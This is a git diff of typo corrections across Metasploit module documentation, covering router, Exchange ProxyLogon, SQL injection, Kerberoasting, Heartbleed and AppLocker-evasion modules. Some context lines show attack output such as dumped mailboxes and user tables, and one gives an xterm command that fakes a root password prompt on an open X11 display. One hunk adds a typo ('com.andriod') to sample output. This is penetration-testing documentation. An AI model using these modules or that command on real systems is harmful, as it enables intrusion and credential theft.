-An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information. On version `1.4.2.15`, the vulnerabilty is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side. On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally.
+An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information. On version `1.4.2.15`, the vulnerability is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side. On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally.
 
 More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019/01/29/cisco-r-rv320-rv325-router-unauthenticated-configuration-export-vulnerability-cve-2019-1653-what-you-need-to-know/).
 
diff --git a/documentation/modules/auxiliary/gather/cloud_lookup.md b/documentation/modules/auxiliary/gather/cloud_lookup.md
index 6e969f4cc7cd..73f11b240447 100644
--- a/documentation/modules/auxiliary/gather/cloud_lookup.md
+++ b/documentation/modules/auxiliary/gather/cloud_lookup.md
@@ -44,7 +44,7 @@ Files containing IP addresses to blacklist during the analysis process, one per
 
 ### THREADS
 
-Number of concurent threads needed for DNS enumeration. Default: 8
+Number of concurrent threads needed for DNS enumeration. Default: 8
 
 ### WORDLIST
 
diff --git a/documentation/modules/auxiliary/gather/elasticsearch_enum.md b/documentation/modules/auxiliary/gather/elasticsearch_enum.md
index a54fb74d9bc8..b424456034dd 100644
--- a/documentation/modules/auxiliary/gather/elasticsearch_enum.md
+++ b/documentation/modules/auxiliary/gather/elasticsearch_enum.md
@@ -2,7 +2,7 @@ This module enumerates Elasticsearch instances.
 It uses the REST API in order to gather information about the server, the cluster, nodes,
-in the cluster, indicies, and pull data from those indicies.
+in the cluster, indices, and pull data from those indices.
 
 ### Docker
 
@@ -85,7 +85,7 @@ msf6 auxiliary(gather/elasticsearch/enum) > run
 ------------ ------ ---------------
 es-docker-cluster yellow 2
 
-[+] Indicies Information
+[+] Indices Information
 ====================
 
 Name Health Status UUID Documents Storage Usage (MB)
diff --git a/documentation/modules/auxiliary/gather/exchange_proxylogon_collector.md b/documentation/modules/auxiliary/gather/exchange_proxylogon_collector.md
index 08db4a86b21b..0abd403d3556 100644
--- a/documentation/modules/auxiliary/gather/exchange_proxylogon_collector.md
+++ b/documentation/modules/auxiliary/gather/exchange_proxylogon_collector.md
@@ -108,7 +108,7 @@ msf6 auxiliary(gather/exchange_proxylogon_collector) > run
 [*] https://172.20.2.110:443 - Selecting the first internal server found
 [*] * targeting internal: server2
 [*] https://172.20.2.110:443 - Attempt to dump emails for
-[*] * successfuly connected to: inbox
+[*] * successfully connected to: inbox
 [*] * selected folder: inbox (AQAYAGdhc3Rvbi5sYWdhZmYAZUBwd25lZC5sYWIALgAAA+uQmQIqiSJLiXyYWVYT65MBACRuvwACXEpAuhG13iUjVgwAAAIBDAAAAA==)
 [*] * number of email found: 4
 [*] https://172.20.2.110:443 - Processing dump of 4 items
@@ -144,7 +144,7 @@ msf6 auxiliary(gather/exchange_proxylogon_collector) > run
 [*] https://172.20.2.110:443 - Selecting the first internal server found
 [*] * targeting internal: server2
 [*] https://172.20.2.110:443 - Attempt to dump contacts for
-[*] * successfuly connected to: contacts
+[*] * successfully connected to: contacts
 [*] * selected folder: contacts (AQAYAGdhc3Rvbi5sYWdhZmYAZUBwd25lZC5sYWIALgAAA+uQmQIqiSJLiXyYWVYT65MBACRuvwACXEpAuhG13iUjVgwAAAIBDgAAAA==)
 [*] * number of contact found: 1
 [*] https://172.20.2.110:443 - Processing dump of 1 items
diff --git a/documentation/modules/auxiliary/gather/get_user_spns.md b/documentation/modules/auxiliary/gather/get_user_spns.md
index 0f573b3d359d..d9a8000bbba7 100644
--- a/documentation/modules/auxiliary/gather/get_user_spns.md
+++ b/documentation/modules/auxiliary/gather/get_user_spns.md
@@ -1,6 +1,6 @@
 ## Description
-This module will try to find Service Principal Names (SPN) that are associated with normal user accounts on the specified domain and then submit requests to retrive Ticket Granting Service (TGS) tickets for those accounts, which may be partially encrypted with the SPNs NTLM hash. After retrieving the TGS tickets, offline brute forcing attacks can be performed to retrieve the passwords for the SPN accounts.
+This module will try to find Service Principal Names (SPN) that are associated with normal user accounts on the specified domain and then submit requests to retrieve Ticket Granting Service (TGS) tickets for those accounts, which may be partially encrypted with the SPNs NTLM hash. After retrieving the TGS tickets, offline brute forcing attacks can be performed to retrieve the passwords for the SPN accounts.
 ## Verification Steps
diff --git a/documentation/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.md b/documentation/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.md
index e0bc7aed8184..54eee52dca0a 100644
--- a/documentation/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.md
+++ b/documentation/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.md
@@ -52,7 +52,7 @@ camera snapshots.
 ## Actions
 ### Automatic
-Retrieves all information suported by this module
+Retrieves all information supported by this module
 ### Configuration
 Retrieves the camera hardware and software configuration
 ### Credentials
@@ -120,7 +120,7 @@ Device manufacturer: Hikvision.China
 Device model: DS-2CD2142FWD-IS
 Device S/N: DS-2CD2142FWD-IS2016HS77777777777
 Device MAC: bc:ad:28:ff:ff:ff
-Device firware version: V5.4.1
+Device firmware version: V5.4.1
 Device firmware release: build 160525
 Device boot version: V1.3.4
 Device boot release: 100316
diff --git a/documentation/modules/auxiliary/gather/ldap_query.md b/documentation/modules/auxiliary/gather/ldap_query.md
index a53dafcec317..2ad9ccad5e6e 100644
--- a/documentation/modules/auxiliary/gather/ldap_query.md
+++ b/documentation/modules/auxiliary/gather/ldap_query.md
@@ -7,7 +7,7 @@ of this JSON/YAML file on disk. Users can also run a single query by using the `RUN_SINGLE_QUERY` option and then setting the `QUERY_FILTER` datastore option to the filter to send to the LDAP server and `QUERY_ATTRIBUTES`
-to a comma seperated string containing the list of attributes they are interested in obtaining
+to a comma separated string containing the list of attributes they are interested in obtaining
 from the results. As a third option can run one of several predefined queries by setting `ACTION` to the
diff --git a/documentation/modules/auxiliary/gather/office365userenum.md b/documentation/modules/auxiliary/gather/office365userenum.md
index 19d332b6bd5c..93444ed141f7 100644
--- a/documentation/modules/auxiliary/gather/office365userenum.md
+++ b/documentation/modules/auxiliary/gather/office365userenum.md
@@ -14,7 +14,7 @@ Note this behaviour appears to be limited to Office365, MS Exchange does not app Microsoft Security Response Center stated on 2017-06-28 that this issue does not "meet the bar for security servicing". As such it is not expected to be fixed any time soon.
-This script is maintaing the ability to run independently of MSF.
+This script is maintaining the ability to run independently of MSF.
 Office365's implementation of ActiveSync is vulnerable.
diff --git a/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md b/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md
index 00643d44501f..deb810183f4c 100644
--- a/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md
+++ b/documentation/modules/auxiliary/gather/peplink_bauth_sqli.md
@@ -289,7 +289,7 @@ msf5 auxiliary(gather/peplink_bauth_sqli) > run
 [+] WAN
 [+] port_type
 [+] ethernet
-[+] actiavted
+[+] activated
 [+] name
 [+] WAN
 [+] enable
@@ -355,7 +355,7 @@ msf5 auxiliary(gather/peplink_bauth_sqli) > run
 [+] WAN
 [+] port_type
 [+] ethernet
-[+] actiavted
+[+] activated
 [+] name
 [+] WAN
 [+] enable
diff --git a/documentation/modules/auxiliary/gather/piwigo_cve_2023_26876.md b/documentation/modules/auxiliary/gather/piwigo_cve_2023_26876.md
index 0e46f28c577a..adff01094238 100644
--- a/documentation/modules/auxiliary/gather/piwigo_cve_2023_26876.md
+++ b/documentation/modules/auxiliary/gather/piwigo_cve_2023_26876.md
@@ -19,7 +19,7 @@ Additionally, set the `USERNAME` option to specify the name of a privileged user
 To setup a test environment, the following steps can be performed.
 1. Install docker [https://docker.io](docker.io)
-2. Inside any directory create the dockerfile bellow:
+2. Inside any directory create the dockerfile below:
 ```yaml
 FROM alpine:3.10.3
@@ -71,7 +71,7 @@ CMD ["php","-S","0.0.0.0:8000","-t","piwigo"]
 inside the folder that contains the `docker-compose.yml` and `Dockerfile` files.
 5. Then Piwigo's installation page should be available at http://localhost:8000
 6. Setup the database with `mysql` as url of database, **piwigo** as `username` **piwigo** as `password`
-7. Login as priviledge user and create any photo album and upload any photo to that album.
+7. Login as privilege user and create any photo album and upload any photo to that album.
 ## Verification Steps
diff --git a/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md b/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md
index d13268110ea9..639d3a163caa 100644
--- a/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md
+++ b/documentation/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.md
@@ -78,9 +78,9 @@ msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > run
 [*] Running module against 192.168.1.100
 [*] Brute forcing to find a valid node id.
-[+] Sucessfully found node at id 1
+[+] Successfully found node at id 1
 [*] Attempting to determine the vBulletin table prefix.
-[+] Sucessfully retrieved table to get prefix from vb5_language.
+[+] Successfully retrieved table to get prefix from vb5_language.
 [*] Getting table columns for vb5_user
 [+] Retrieved 78 columns for vb5_user
 [*] Dumping table vb5_user
diff --git a/documentation/modules/auxiliary/gather/zoomeye_search.md b/documentation/modules/auxiliary/gather/zoomeye_search.md
index bd790c6963a5..5c4eb8881f44 100644
--- a/documentation/modules/auxiliary/gather/zoomeye_search.md
+++ b/documentation/modules/auxiliary/gather/zoomeye_search.md
@@ -4,7 +4,7 @@ and output the information gathered into a table which can then be saved for lat
 ## Note
 You need to register for ZoomEye by creating an account with Telnet404. You can register for a temp email
-at https://temp-mail.org and get a temp phone number to recieve the SMS's needed to sign up at https://smsreceivefree.com.
+at https://temp-mail.org and get a temp phone number to receive the SMS's needed to sign up at https://smsreceivefree.com.
 Then browse to https://www.zoomeye.org, click on the `Register` button, and follow the steps from there.
diff --git a/documentation/modules/auxiliary/scanner/db2/discovery.md b/documentation/modules/auxiliary/scanner/db2/discovery.md
index 63e696dbfacf..3ac89e777382 100644
--- a/documentation/modules/auxiliary/scanner/db2/discovery.md
+++ b/documentation/modules/auxiliary/scanner/db2/discovery.md
@@ -9,7 +9,7 @@ Using the discovery method, catalog information for a remote server can be autom
 1. `use auxiliary/scanner/db2/discovery`
 2. `set RHOSTS [target address range/cidr]`
-3. `set THREDS [number of threads]`
+3. `set THREADS [number of threads]`
 4. `run`
 ## Scenarios
diff --git a/documentation/modules/auxiliary/scanner/gopher/gopher_gophermap.md b/documentation/modules/auxiliary/scanner/gopher/gopher_gophermap.md
index 8f7865b1d33c..c4969425aa45 100644
--- a/documentation/modules/auxiliary/scanner/gopher/gopher_gophermap.md
+++ b/documentation/modules/auxiliary/scanner/gopher/gopher_gophermap.md
@@ -103,7 +103,7 @@ The following table contains the file types associated with the characters:
 **PATH**
- It is possible to view content within a directory of the gophermap. If the intial run shows directory `Directory: foobar`,
+ It is possible to view content within a directory of the gophermap. If the initial run shows directory `Directory: foobar`,
 setting **path** to `/foobar` will enumerate the contents of that folder. Default: [empty string].
 ## Scenarios
diff --git a/documentation/modules/auxiliary/scanner/http/cassandra_web_file_read.md b/documentation/modules/auxiliary/scanner/http/cassandra_web_file_read.md
index 76edea9a7031..a5ef4a306ddb 100644
--- a/documentation/modules/auxiliary/scanner/http/cassandra_web_file_read.md
+++ b/documentation/modules/auxiliary/scanner/http/cassandra_web_file_read.md
@@ -9,7 +9,7 @@ This module has been tested successfully on Cassandra Web versions: This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web 'Cassandra Web' version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.
-This vulnerability occured due to the disabled Rack::Protection module.
+This vulnerability occurred due to the disabled Rack::Protection module.
 This web service listens on TCP port 3000 by default on all network interface.
diff --git a/documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md b/documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md
index 36853d4c1480..a24242127c7c 100644
--- a/documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md
+++ b/documentation/modules/auxiliary/scanner/http/cisco_asa_clientless_vpn.md
@@ -72,7 +72,7 @@ The next part of the installation will require a Windows machine. From your Wind
 1. Click "Install ASDM Launcher"
 1. Enter creds `blank`:labpass1 (where blank is nothing and labpass1 is your enable password)
 1. Install the downloaded `dm-launcher.msi` (before 7.18.1 it will be unsigned)
-1. If Java isn't installed, intall Java 1.8 (current at time of writing is 8 Update 333): https://www.java.com/en/download/
+1. If Java isn't installed, install Java 1.8 (current at time of writing is 8 Update 333): https://www.java.com/en/download/
 1. Start the ASDM Launcher via `C:\Program Files (x86)\Cisco Systems\ASDM\run.bat`
 1. Enter your ASAv's IP address (10.9.249.201)
 1. Enter a blank username
diff --git a/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md b/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md
index bfb260d78f13..a102171128a5 100644
--- a/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md
+++ b/documentation/modules/auxiliary/scanner/http/cisco_device_manager.md
@@ -4,7 +4,7 @@
 ## Vulnerable Application
- Any Cisco networking device with the HTTP inteface turned on.
+ Any Cisco networking device with the HTTP interface turned on.
 ## Verification Steps
diff --git a/documentation/modules/auxiliary/scanner/http/dir_scanner.md b/documentation/modules/auxiliary/scanner/http/dir_scanner.md
index c4ee052293ce..014094e2217a 100644
--- a/documentation/modules/auxiliary/scanner/http/dir_scanner.md
+++ b/documentation/modules/auxiliary/scanner/http/dir_scanner.md
@@ -2,7 +2,7 @@
 This module scans one or more web servers for interesting directories that can be further explored.
-## Verfication Steps
+## Verification Steps
 1. Do: ```use auxiliary/scanner/http/dir_scanner```
 2. Do: ```set RHOSTS [IP]```
diff --git a/documentation/modules/auxiliary/scanner/http/es_file_explorer_open_port.md b/documentation/modules/auxiliary/scanner/http/es_file_explorer_open_port.md
index f06b9278fd4a..9411e1af1ce7 100644
--- a/documentation/modules/auxiliary/scanner/http/es_file_explorer_open_port.md
+++ b/documentation/modules/auxiliary/scanner/http/es_file_explorer_open_port.md
@@ -127,7 +127,7 @@ resource (es.rb)> set action LISTAPPSSYSTEM
 action => LISTAPPSSYSTEM
 resource (es.rb)> run
 [+] 1.1.1.1:59777
- Package Access Helper (com.android.defcontainer) Version: 4.4.2-20150203
+ Package Access Helper (com.andriod.defcontainer) Version: 4.4.2-20150203
 Launcher (com.android.launcher) Version: 4.4.2-20150203
 Contacts (com.android.contacts) Version: 4.4.2-20150203
 com.android.providers.partnerbookmarks (com.android.providers.partnerbookmarks) Version: 4.4.2-20150203
@@ -212,7 +212,7 @@ resource (es.rb)> run
 [+] 1.1.1.1:59777
 TalkBack (com.google.android.marvin.talkback) Version: 5.0.7
 Google Play services (com.google.android.gms) Version: 12.6.85 (000302-197041431)
- Phone (com.andriod.phone) Version: 1.0
+ Phone (com.android.phone) Version: 1.0
 Google Play Music (com.google.android.music) Version: 8.12.7210-1.F
 Google Text-to-speech Engine (com.google.android.tts) Version: 3.15.18.200023596
 Cloud Print (com.google.android.apps.cloudprint) Version: 1.40
diff --git a/documentation/modules/auxiliary/scanner/http/frontpage_credential_dump.md b/documentation/modules/auxiliary/scanner/http/frontpage_credential_dump.md
index 5b72b2c1edf8..021c55505192 100644
--- a/documentation/modules/auxiliary/scanner/http/frontpage_credential_dump.md
+++ b/documentation/modules/auxiliary/scanner/http/frontpage_credential_dump.md
@@ -1,5 +1,5 @@
 ## Description
-When Microsoft FrontPage is run on a non-IIS web server it creates encrypted password files in the _vti_pvt folder. When this folder is accessible, these files can be downloaded and parsed to obtain encrytped passwords. These encrypted passwords can then be cracked offline and used to gain further access to the server.
+When Microsoft FrontPage is run on a non-IIS web server it creates encrypted password files in the _vti_pvt folder. When this folder is accessible, these files can be downloaded and parsed to obtain encrypted passwords. These encrypted passwords can then be cracked offline and used to gain further access to the server.
 Affected Files:
diff --git a/documentation/modules/auxiliary/scanner/http/http_put.md b/documentation/modules/auxiliary/scanner/http/http_put.md
index 72d362e51aad..2c9e73bf7a59 100644
--- a/documentation/modules/auxiliary/scanner/http/http_put.md
+++ b/documentation/modules/auxiliary/scanner/http/http_put.md
@@ -7,7 +7,7 @@ This module can abuse misconfigured web servers to upload and delete web content
 2. Do: ```set RHOSTS [IP]```
 3. Do: ```set RPORT [PORT]```
 4. Do: ```set PATH [PATH]```
-5. Do: ```set FILENAME [FILNAME]```
+5. Do: ```set FILENAME [FILENAME]```
 6. Do: ```set FILEDATA [PATH]```
 7. Do: ```run```
diff --git a/documentation/modules/auxiliary/scanner/http/jira_user_enum.md b/documentation/modules/auxiliary/scanner/http/jira_user_enum.md
index efc0fda85d40..33f66ec62df3 100644
--- a/documentation/modules/auxiliary/scanner/http/jira_user_enum.md
+++ b/documentation/modules/auxiliary/scanner/http/jira_user_enum.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
- [Jira](https://www.atlassian.com/software/jira) Jira is team managment software for agile teams.
+ [Jira](https://www.atlassian.com/software/jira) Jira is team management software for agile teams.
 This module has been tested successfully on:
diff --git a/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md b/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md
index 2592fb5ceb0c..03cca6bd63ae 100644
--- a/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md
+++ b/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md
@@ -1,4 +1,4 @@
-## Decription
+## Description
 This module extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior.
diff --git a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md
index a868b9816521..dc361c0530da 100644
--- a/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md
+++ b/documentation/modules/auxiliary/scanner/http/tomcat_mgr_login.md
@@ -106,7 +106,7 @@ msf auxiliary(tomcat_mgr_login) > run
 ### Tomcat 8
-Tomcat 8.0.32 unning on Windows XP
+Tomcat 8.0.32 running on Windows XP
 ```
 msf > use auxiliary/scanner/http/tomcat_mgr_login
diff --git a/documentation/modules/auxiliary/scanner/http/wordpress_login_enum.md b/documentation/modules/auxiliary/scanner/http/wordpress_login_enum.md
index 49e7c8b9013b..cba3dd0e71d1 100644
--- a/documentation/modules/auxiliary/scanner/http/wordpress_login_enum.md
+++ b/documentation/modules/auxiliary/scanner/http/wordpress_login_enum.md
@@ -1,6 +1,6 @@
 ## Descriptions
-This auxiliary module will brute-force a WordPress installation and first determine valid usernames and then perform a password-guessing attack. WordPress and WordPress MU before 2.8.1 exhibit different behavior for a failed login attempt depending on whether the user account exists, which allows remote attackers to enumerate valid usernames. NOTE: The vendor reportedly disputes the significance of this issue, indicating that the behavior exists for "user convenience." More infomation can be found in [CVE-2009-2335](https://www.cvedetails.com/cve/cve-2009-2335).
+This auxiliary module will brute-force a WordPress installation and first determine valid usernames and then perform a password-guessing attack. WordPress and WordPress MU before 2.8.1 exhibit different behavior for a failed login attempt depending on whether the user account exists, which allows remote attackers to enumerate valid usernames. NOTE: The vendor reportedly disputes the significance of this issue, indicating that the behavior exists for "user convenience." More information can be found in [CVE-2009-2335](https://www.cvedetails.com/cve/cve-2009-2335).
 ## Verification Steps
diff --git a/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md b/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md
index 1376502d568d..fc995103b525 100644
--- a/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_easy_wp_smtp.md
@@ -13,14 +13,14 @@ the SMTP username and password. There is one potential false negative case where the `aggressive` option should be used. If debug mode was enabled, however only the `Test Email` was used (or no legit email has been sent by the server), the debug file won't exist yet. This will be remedied by the first password reset request, but to avoid this module
-being too noisy, it won't happen unles `aggressive` is set to `true`.
+being too noisy, it won't happen unless `aggressive` is set to `true`.
 To summarize:
 1. Vulnerable version of Easy WP SMTP
 1. debug turned on for Easy WP SMTP
 1. SMTP configured for Easy WP SMTP
-1. direcotry listings enabled
+1. directory listings enabled
 ### Install
diff --git a/documentation/modules/auxiliary/scanner/misc/sunrpc_portmapper.md b/documentation/modules/auxiliary/scanner/misc/sunrpc_portmapper.md
index 70fb72cf27a2..4873d9567599 100644
--- a/documentation/modules/auxiliary/scanner/misc/sunrpc_portmapper.md
+++ b/documentation/modules/auxiliary/scanner/misc/sunrpc_portmapper.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
-RPC Portmapper, or more recently renamed to rpcbind, is fairly common and this scanner searches for its existance. The idea behind rpcbind was to create a
+RPC Portmapper, or more recently renamed to rpcbind, is fairly common and this scanner searches for its existence. The idea behind rpcbind was to create a
 'directory' that could be asked where a service is running (port). Having this single port/service be queryable meant, the services being managed by rpcbind could actually be running on any port or protocol, and rpdbind would be in charge of letting clients know where they were. This is more or less an outdated model/service, and NFS is arguably the most popular service still utilizing rpcbind. The following was done on Kali linux:
diff --git a/documentation/modules/auxiliary/scanner/mqtt/connect.md b/documentation/modules/auxiliary/scanner/mqtt/connect.md
index dd2684bef203..35a6ff98e165 100644
--- a/documentation/modules/auxiliary/scanner/mqtt/connect.md
+++ b/documentation/modules/auxiliary/scanner/mqtt/connect.md
@@ -22,7 +22,7 @@ $ docker run -i -p 1883:1883 toke/mosquitto
 1513822879: Opening ipv6 listen socket on port 1883.
 ```
-#### Docker MQTT Server Without Anonymous Authenticaiton
+#### Docker MQTT Server Without Anonymous Authentication
 Msquitto can be configured to require credentials. To run in this way:
diff --git a/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md b/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md
index a827edb84bdb..899cfb400067 100644
--- a/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md
+++ b/documentation/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.md
@@ -5,7 +5,7 @@ This applies to all versions of SAP software. The SAP Management Console (SAP MC) provides a common framework for centralized system management. It allows you to monitor and perform basic administration tasks on the SAP system centrally, which simplifies system administration. (https://help.sap.com/doc/saphelp_nwpi711/7.1.1/en-US/fa/ec218eb89b4424a9a0b423b0643952/frameset.htm)
-SAP exposes an API on port tcp/50013 with the SOAP Management Console. Some webmethods are authenticated with a valid login/password and others are unauthenticated and reacheable by default.
+SAP exposes an API on port tcp/50013 with the SOAP Management Console. Some webmethods are authenticated with a valid login/password and others are unauthenticated and reachable by default.
 With this module you can list the config files that SAP loads when starts the SAP server. This unauthenticated information disclosure can be used in a more advanced attack to get knowledge about in which paths SAP stores the config files to, for example, retrieve sensitive data or trojanize the startup process.
diff --git a/documentation/modules/auxiliary/scanner/scada/profinet_siemens.md b/documentation/modules/auxiliary/scanner/scada/profinet_siemens.md
index afd204a46ffe..c90679f101c6 100644
--- a/documentation/modules/auxiliary/scanner/scada/profinet_siemens.md
+++ b/documentation/modules/auxiliary/scanner/scada/profinet_siemens.md
@@ -1,5 +1,5 @@
 Siemens Industrial controllers and most other industrial OEMs
-use a proprietary protocol to discover their devices accross a network.
+use a proprietary protocol to discover their devices across a network.
 In the case of Siemens this is called the Profinet Discover Protocol.
 Known in Wireshark as PN_DCP
diff --git a/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md b/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md
index 70376406e547..2204fe0a2cdc 100644
--- a/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md +++ b/documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md @@ -4,7 +4,7 @@ This is a well [documented](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup) feature of IOS and many other networking devices, and is part of an administrator functionality. A read-write community string is required, as well as a tftp server (metasploit includes one). - After the config has been copied, the SNMP paramters are deleted. + After the config has been copied, the SNMP parameters are deleted. ## Verification Steps diff --git a/documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md b/documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md index 23e75c513b24..b1d85f92c0dd 100644 --- a/documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md +++ b/documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md @@ -4,7 +4,7 @@ A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): [here](https://github.com/h00die/MSF-Testing-Scripts/tree/master/juniper_firmware) - For verification puposes, an example vuln python script is also available [here](https://github.com/h00die/MSF-Testing-Scripts) + For verification purposes, an example vuln python script is also available [here](https://github.com/h00die/MSF-Testing-Scripts) ## Verification Steps diff --git a/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md b/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md index 2f64b4da9b14..280db80f7a8d 100644 --- a/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md +++ b/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md 
@@ -77,7 +77,7 @@ $ curl https://localhost:8443 -k **TLS_VERSION** - The specific version of TLS (or SSL) to use, if only specific ones are avaialble. Defaults to `1.0` (TLS1.0). + The specific version of TLS (or SSL) to use, if only specific ones are available. Defaults to `1.0` (TLS1.0). **MAX_KEYTRIES** @@ -90,7 +90,7 @@ $ curl https://localhost:8443 -k **DUMPFILTER** - A regular expresion (used in scan function) to use to filter the dump before storing. Default is `nil`. + A regular expression (used in scan function) to use to filter the dump before storing. Default is `nil`. **RESPONSE_TIMEOUT** diff --git a/documentation/modules/auxiliary/scanner/ssl/ssl_version.md b/documentation/modules/auxiliary/scanner/ssl/ssl_version.md index 3523d5f48e2a..0321e2c5fce9 100644 --- a/documentation/modules/auxiliary/scanner/ssl/ssl_version.md +++ b/documentation/modules/auxiliary/scanner/ssl/ssl_version.md @@ -17,7 +17,7 @@ versions installed on the system. List is dynamically generated. Defaults to `al ### SSLCipher -Which SSL/TLS Cipher to use. `all` implies all ciphers avaiable for the version of SSL/TLS being used and which +Which SSL/TLS Cipher to use. `all` implies all ciphers available for the version of SSL/TLS being used and which are usable by the metasploit + ruby + OpenSSL versions installed on the system. List is dynamically generated. Defaults to `all` diff --git a/documentation/modules/auxiliary/scanner/x11/open_x11.md b/documentation/modules/auxiliary/scanner/x11/open_x11.md index 2adb1ed9dfcc..03883e86e767 100644 --- a/documentation/modules/auxiliary/scanner/x11/open_x11.md +++ b/documentation/modules/auxiliary/scanner/x11/open_x11.md 
@@ -173,7 +173,7 @@ This was tested against Ubuntu 12.04, 14.04, 16.04 and Solaris 10. 1. start `xspy` 2. `xterm -T "Root Permission Required" -display [ip]:0 -e "echo -e -n 'root password: '; read passwd; echo 'Authentication Failure'; echo -e -n 'root password: '; read passwd"` - - Notice it asks twice for the password incase of a mistyped initial password. This can also be adjusted to just say password or the real user's username + - Notice it asks twice for the password in case of a mistyped initial password. This can also be adjusted to just say password or the real user's username - The victim's typed text by the user will not be masked (`*`) ### Direct Exploitation diff --git a/documentation/modules/auxiliary/server/local_hwbridge.md b/documentation/modules/auxiliary/server/local_hwbridge.md index fbbf357533f1..fba97691c859 100644 --- a/documentation/modules/auxiliary/server/local_hwbridge.md +++ b/documentation/modules/auxiliary/server/local_hwbridge.md @@ -12,11 +12,11 @@ To experimient with using Metasploit to send automtovie CAN bus packets you can the SocketCAN capabilities of Linux to create a virtual CAN device. NOTE: If you have a supported CAN sniffer you could also use a real can device. -In order for the local_hwbridge to inteface with SocketCAN you will need: +In order for the local_hwbridge to interface with SocketCAN you will need: * can-utils -Once those are installed you can setup a virtual CAN inteface using: +Once those are installed you can setup a virtual CAN interface using: ``` sudo modprobe can diff --git a/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md b/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md index 531ff25c4d2e..c8056be03f41 100644 --- a/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md +++ b/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md 
@@ -3,7 +3,7 @@ This module exploits a vulnerability in Dlink Central WifiManager (CWM-100), found in versions lower than v1.03R0100_BETA6, allowing unauthenticated users to -execute arbitary SQL queries. +execute arbitrary SQL queries. This module has 3 actions: @@ -175,6 +175,6 @@ msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run ### Going further -It is possible to upload arbitary files to the target system using queries of the form +It is possible to upload arbitrary files to the target system using queries of the form (copy ... to ...), but using full paths, the attacker must know the path of the webroot to upload a webshell this way. diff --git a/documentation/modules/evasion/windows/applocker_evasion_regasm_regsvcs.md b/documentation/modules/evasion/windows/applocker_evasion_regasm_regsvcs.md index 221cf9f2eda8..2f92158a1c70 100644 --- a/documentation/modules/evasion/windows/applocker_evasion_regasm_regsvcs.md +++ b/documentation/modules/evasion/windows/applocker_evasion_regasm_regsvcs.md @@ -12,7 +12,7 @@ This evasion will work on all versions of Windows that include .NET versions 3.5 ## Options - **TXT_FILE** - Filename for the evasive file (default: regasm_regsvcs.txt). -- **SNK_FILE** - Filename for the .snk file (default: key.snk). (note: to aid furter evasion it is recommended to create your own .snk file ref: https://docs.microsoft.com/en-us/dotnet/framework/app-domains/how-to-sign-an-assembly-with-a-strong-name) +- **SNK_FILE** - Filename for the .snk file (default: key.snk). (note: to aid further evasion it is recommended to create your own .snk file ref: 